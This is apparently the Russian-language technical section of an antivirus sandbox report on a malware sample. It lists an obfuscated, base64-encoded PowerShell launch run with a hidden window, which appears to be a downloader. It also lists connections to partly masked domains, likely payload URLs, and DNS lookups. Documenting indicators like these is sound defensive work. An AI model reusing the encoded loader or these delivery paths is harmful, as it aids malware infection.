Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABCADgAdABkAGYAMQBzAD0AKAAnAE4AJwArACgAJwA0AHgAJwArACcAdgBlACcAKQArACcAOAAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBzAEUAUgBQAHIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\893324.cvr
- 'ri###utra.com':80
- 'am####tchell.com':80
- 'am####tchell.com':443
- 'ad#######isposalsolutions.com':80
- 'cr###mut.com':80
- 'sa###ago.org':443
- http://ri###utra.com/img/o9o/
- http://am####tchell.com/themes/d3i/
- http://cr###mut.com/d1ad_1a7z_jg4hewt/qWT/
- 'am####tchell.com':443
- 'sa###ago.org':443
- DNS ASK ri###utra.com
- DNS ASK am####tchell.com
- DNS ASK px##360.com
- DNS ASK zh###youyy.com
- DNS ASK ad#######isposalsolutions.com
- DNS ASK cr###mut.com
- DNS ASK sa###ago.org
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABCADgAdABkAGYAMQBzAD0AKAAnAE4AJwArACgAJwA0AHgAJwArACcAdgBlACcAKQArACcAOAAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBzAEUAUgBQAHIATw... (со скрытым окном)